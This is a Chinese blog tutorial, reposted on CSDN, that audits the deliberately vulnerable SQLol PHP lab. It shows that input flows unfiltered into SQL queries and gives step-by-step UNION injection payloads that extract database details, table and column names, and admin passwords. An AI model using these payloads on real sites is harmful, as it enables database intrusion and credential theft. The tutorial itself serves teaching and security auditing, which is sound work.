那些年我们一起挖掘SQL注入 – 1.什么都没过滤的入门情况

最新推荐文章于 2024-06-21 16:58:09 发布
最新推荐文章于 2024-06-21 16:58:09 发布
阅读量614 收藏
点赞数
分类专栏: 代码审计 文章标签: php 代码审计

0x01 背景

首先恭喜Seay法师的力作《代码审计:企业级web代码安全架构》,读了两天后深有感触。想了想自己也做审计有2年了,决定写个PHP代码审计实例教程的系列,希望能够帮助到新人更好的了解这一领域,同时也作为自己的一种沉淀。大牛请自觉绕道~

0x02 环境搭建

PHP+MySql的集成环境特别多,像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了,网上搜索一下很多就不赘述。
这里提的环境是SQLol,它是一个可配置的SQL注入测试平台,包含了简单的SQL注入测试环境,即SQL语句的四元素增(Insert)、删(Delete)、改(Update)和查(Select)。
PS:什么都没过滤的情况太少了,现在再怎么没有接触过安全的程序员都知道用一些现成的框架来写代码,都有过滤的。所以这个平台主要训练在各种情况下如何进行sql注入以及如何写POC。
①源码我打包了一份:http://pan.baidu.com/s/1nu2vaOT
②解压到www的sql目录下,直接打开http://localhost/sql即可看到如下界面:

0x03 漏洞分析

首先看下源码结构,比较简单,只有一个include文件夹包含一些数据库配置文件:

这里进行简单的源码分析,看不懂就略过以后再看~

1.看select.php文件,开始引入了/include/nav.inc.php

<?php include('includes/nav.inc.php'); ?>

2.跟进nav.inc.php文件,发现该文件是select的核心表单提交页面以及输入处理程序:

表单的输入处理程序比较简单,主要是根据你表单的选择作出相应的过滤和处理,如下

<?php
	$_REQUEST = array_merge($_GET, $_POST, $_COOKIE);

	if(isset($_REQUEST['submit'])){ //submit后,开始进入处理程序
	
	switch($_REQUEST['sanitize_quotes']){ //单引号的处理,表单选择不过滤,就是对应none,新手看不懂可以学好php再回来
		
		case 'quotes_double':
			$_REQUEST['inject_string'] = str_replace('\'', '\'\'', $_REQUEST['inject_string']);
			break;
		case 'quotes_escape':
			$_REQUEST['inject_string'] = str_replace('\'', '\\\'', $_REQUEST['inject_string']);
			break;
		case 'quotes_remove':
			$_REQUEST['inject_string'] = str_replace('\'', '', $_REQUEST['inject_string']);
			break;
	
	}
	
	//对空格的处理,如果参数中没有spaces_remove或者spaces_remove!=on就不会过滤空格
	if(isset($_REQUEST['spaces_remove']) and $_REQUEST['spaces_remove'] == 'on') $_REQUEST['inject_string'] = str_replace(' ', '', $_REQUEST['inject_string']);
	
	//黑名单关键字的处理,文章用不上,略过...
	if(isset($_REQUEST['blacklist_keywords'])){
		$blacklist = explode(',' , $_REQUEST['blacklist_keywords']);
	}
	//过滤级别,新手可以不用管,略过...
	if(isset($_REQUEST['blacklist_level'])){
		switch($_REQUEST['blacklist_level']){
			//We process blacklists differently at each level. At the lowest, each keyword is removed case-sensitively.
			//At medium blacklisting, checks are done case-insensitively.
			//At the highest level, checks are done case-insensitively and repeatedly.
		
			case 'low':
				foreach($blacklist as $keyword){
					$_REQUEST['inject_string'] = str_replace($keyword, '', $_REQUEST['inject_string']);
				}
				break;
			case 'medium':
				foreach($blacklist as $keyword){
					$_REQUEST['inject_string'] = str_replace(strtolower($keyword), '', strtolower($_REQUEST['inject_string']));
				}
				break;
			case 'high':
				do{
					$keyword_found = 0;
					foreach($blacklist as $keyword){
						$_REQUEST['inject_string'] = str_replace(strtolower($keyword), '', strtolower($_REQUEST['inject_string']), $count);
						$keyword_found += $count;
					}	
				}while ($keyword_found);
				break;
			
		}
	}
	}

	?>

3.我们再返回到select.php,发现后面也有个submit后表单处理程序,判断要注射的位置并构造sql语句,跟进看下:

<?php
	if(isset($_REQUEST['submit'])){ //submit后,进入处理程序之二,1在上面
	
	if($_REQUEST['location'] == 'entire_query'){//判断是不是整条语句都要注入,这里方便学习可以忽略不管
		
		$query = $_REQUEST['inject_string'];
		if(isset($_REQUEST['show_query']) and $_REQUEST['show_query']=='on') $displayquery = '<u>' . $_REQUEST['inject_string'] . '</u>';
		
	} else { //这里是根据你选择要注射的位置来构造sql语句
		
		$display_column_name = $column_name = 'username';
		$display_table_name = $table_name = 'users';
		$display_where_clause = $where_clause = 'WHERE isadmin = 0';
		$display_group_by_clause = $group_by_clause = 'GROUP BY username';
		$display_order_by_clause = $order_by_clause = 'ORDER BY username ASC';
		$display_having_clause = $having_clause = 'HAVING 1 = 1';
	
		switch ($_REQUEST['location']){
			case 'column_name':
				$column_name = $_REQUEST['inject_string'];
				$display_column_name = '<u>' . $_REQUEST['inject_string'] . '</u>';
				break;
			case 'table_name':
				$table_name = $_REQUEST['inject_string'];
				$display_table_name = '<u>' . $_REQUEST['inject_string'] . '</u>';
				break;
			case 'where_string':
				$where_clause = "WHERE username = '" . $_REQUEST['inject_string'] . "'";
				$display_where_clause = "WHERE username = '" . '<u>' . $_REQUEST['inject_string'] . '</u>' . "'";
				break;
			case 'where_int':
				$where_clause = 'WHERE isadmin = ' . $_REQUEST['inject_string'];
				$display_where_clause = 'WHERE isadmin = ' . '<u>' . $_REQUEST['inject_string'] . '</u>';
				break;
			case 'group_by':
				$group_by_clause = 'GROUP BY ' . $_REQUEST['inject_string'];
				$display_group_by_clause = 'GROUP BY ' . '<u>' . $_REQUEST['inject_string'] . '</u>';
				break;
			case 'order_by':
				$order_by_clause = 'ORDER BY ' . $_REQUEST['inject_string'] . ' ASC';
				$display_order_by_clause = 'ORDER BY ' . '<u>' . $_REQUEST['inject_string'] . '</u>' . ' ASC';
				break;
			case 'having':
				$having_clause = 'HAVING isadmin = ' . $_REQUEST['inject_string'];
				$display_having_clause = 'HAVING isadmin = ' . '<u>' . $_REQUEST['inject_string'] . '</u>';
				break;
		}
		
		$query = "SELECT $column_name FROM $table_name $where_clause $group_by_clause $order_by_clause ";
		/*Probably a better way to create $displayquery...
		This allows me to underline the injection string
		in the resulting query that's displayed with the
		"Show Query" option without munging the query
		which hits the database.*/
		$displayquery = "SELECT $display_column_name FROM $display_table_name $display_where_clause $display_group_by_clause $display_order_by_clause ";
		
	}
	
	include('includes/database.inc.php');//这里又引入了一个包,我们继续跟进看看
	
	}
	?>

4.跟进database.inc.php,终于带入查询了,所以表单看懂了,整个过程就没过滤^ ^

$db_conn = NewADOConnection($dsn);

print("\n<br>\n<br>"); if(isset($_REQUEST['show_query']) and $_REQUEST['show_query']=='on') echo "Query (injection string is <u>underlined</u>): " . $displayquery . "\n<br>"; $db_conn->SetFetchMode(ADODB_FETCH_ASSOC); $results = $db_conn->Execute($query);

0x04 漏洞证明

1.有了注入点了,我们先随意输入1然后选择注射位置为Where子句里的数字,开启Seay的MySql日志监控:

2.SQL查询语句为:SELECT username FROM users WHERE isadmin = 1 GROUP BY username ORDER BY username ASC
根据MySql日志监控里获取的sql语句判断可输出的只有一个字段,然后我们构造POC:

-1 union select 222333#

找到输出点“222333”的位置如下图:

3.构造获取数据库相关信息的POC:

-1 union select concat(database(),0x5c,user(),0x5c,version())#

成功获取数据库名(sqlol)、账户名(root@localhost)和数据库版本(5.6.12)如下:

4.构造获取数据库sqlol中所有表信息的POC:

-1 union select GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=0x73716C6F6C#

成功获取数据库sqlol所有表信息如下:

5.构造获取admin表所有字段信息的POC:

-1 union select GROUP_CONCAT(DISTINCT column_name) from information_schema.columns where table_name=0x61646D696E#

成功获取表admin所有字段信息如下:

6.构造获取admin表账户密码的POC:

-1 union select GROUP_CONCAT(DISTINCT username,0x5f,password) from admin#

成功获取管理员的账户密码信息如下:

本条目发布于 2016年2月19日。属于 Web安全分类。 作者是HackBraid
adm1nx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入过滤字典.txt
10-15
sql注入过滤字典.txt
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
【PHP代码审计】 那些年我们一起挖掘SQL注入 - 1.什么都过滤入门情况
05-28 129
0x01 背景 首先恭喜Seay法师的力作《代码审计:企业级web代码安全架构》,读了两天后深有感触。想了想自己也做审计有2年了,决定写个PHP代码审计实例教程的系列,希望能够帮助到新人更好的了解这一领域,同时也作为自己的一种沉淀。大牛请自觉绕道~ 0x02 环境搭建 PHP+MySql的集成环境特别多,像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了,网上搜...
[PHP代码审计] -那些年我们一起挖掘SQL注入 - 1.什么都过滤入门情况-学习笔记
foolisheddy
02-03 484
[PHP代码审计] -那些年我们一起挖掘SQL注入 - 1.什么都过滤入门情况-学习笔记 PHP代码审计 -那些年我们一起挖掘SQL注入 - 1什么都过滤入门情况-学习笔记 环境搭建 漏洞分析 漏洞证明 总结 十六进制的好处 一些mysql函数 测试sql注入的流程 环境搭建: mamp pro +phpstorm 漏洞分析: 看下源码结构,只有一
【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入
05-28 288
【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入 0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。二次注入也是一种比较常见的注入,它涉及到入库和出库。因为有全局转义所以...
1.什么都过滤入门情况
→_→
05-04 495
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ------------------------------------------------------------------------------------------------------------------------------ 1.XSS的存在,一定是伴随着输入,与输出2个概...
SQL注入过滤限制绕过方法
weixin_30879169的博客
04-28 1217
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete ...
SQL注入漏洞挖掘.pptx
10-27
SQL 注入漏洞挖掘 SQL 注入漏洞挖掘是指攻击者通过构造特殊的输入,来 trick 数据库执行恶意的 SQL 语句,从而获取敏感信息或控制数据库的权限。 SQL 注入漏洞是 Web 应用程序中最常见的安全漏洞之一,攻击者可以...
SQL注入漏洞挖掘.ppt
10-27
1. **内联SQL注入**:攻击者插入的SQL语句与原始SQL语句一起执行,这通常涉及到字符串连接操作。 - 测试语句示例:在数字型字段,可以尝试输入`' or 1=1 --`,如果返回所有记录,很可能存在注入点。 2. **终止式...
C# MVC 过滤器防止SQL注入
09-15
C# MVC 过滤器防止SQL注入
众多开源系统使用的过滤SQL注入函数
weixin_34255793的博客
11-16 146
$magic_quotes_gpc = get_magic_quotes_gpc(); @extract(daddslashes($_COOKIE)); @extract(daddslashes($_POST)); @extract(daddslashes($_GET)); if(!$magic_quotes_gpc) { $_FILES = daddslashes($_F...
在php输出字符串时执行html标签,把字符串作为PHP代码执行
weixin_30074929的博客
06-18 986
用户评论:maxim at inbox dot ru (2012-06-11 13:55:29)Anotherwaytocatcheval()error:$exeption=eval($str);If($exeption===null)//allright,executionwascorrectelse//wasn'tcorrect?>vladimir at bash...
PHP foreach的两种用法 as $key => $value
别在熬夜了!
11-13 4531
一 foreach的语法介绍 PHP 4以上的版本包括了 foreach 结构,这只是一种遍历数组简便方法。foreach 仅能用于数组,当试图将其用于其它数据类型或者一个未初始化的变量时会产生错误。有两种语法,第二种是第一种的有用的扩展。 1 2 foreach(array_expression as $value) statement fo
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 437
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
从一道CTF题到HTTP请求走私攻击
蚁景网安学院
11-03 514
01前言 最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。02Roar...
k8s解决java服务下载超时问题
云深海阔专栏
06-18 252
我们在走ingress的java程序的时候,往往会有导出数据的功能,这个时候就会有因网络慢、后台处理时间过长导致下载超时,也有因下载文件太大,导致下载失败,综合解决办法如下。1)更改反向代理超时时间。
Linux-安装及管理程序
A6985HG的博客
06-19 731
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在有稳定互联网连接或需要大规模部署的情况下更为实用。
深入了解PHP的If...Else语句
Perfect—完美的博客
06-20 456
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
深度解析SD-WAN在企业组网中的应用场景
最新发布
TIANGEKUAJING的博客
06-21 334
在现代企业快速发展的网络环境中,SD-WAN技术不仅是实现企业各站点间高效连接的关键,也是满足不同站点对互联网、SaaS云应用和公有云等多种业务需求的理想选择。本文将从企业的WAN业务需求出发,对SD-WAN的组网场景进行全面解析,涵盖多种业务情境。
2023年防sql注入全面过滤 asp防sql注入代码大全
10-24
总之,为了防止 SQL 注入攻击,我们需要综合使用验证和过滤输入数据、参数化查询、存储过程或预编译语句、限制用户权限以及处理错误信息等多种技术手段。这些措施的综合使用可以提高应用程序的安全性,并保护数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值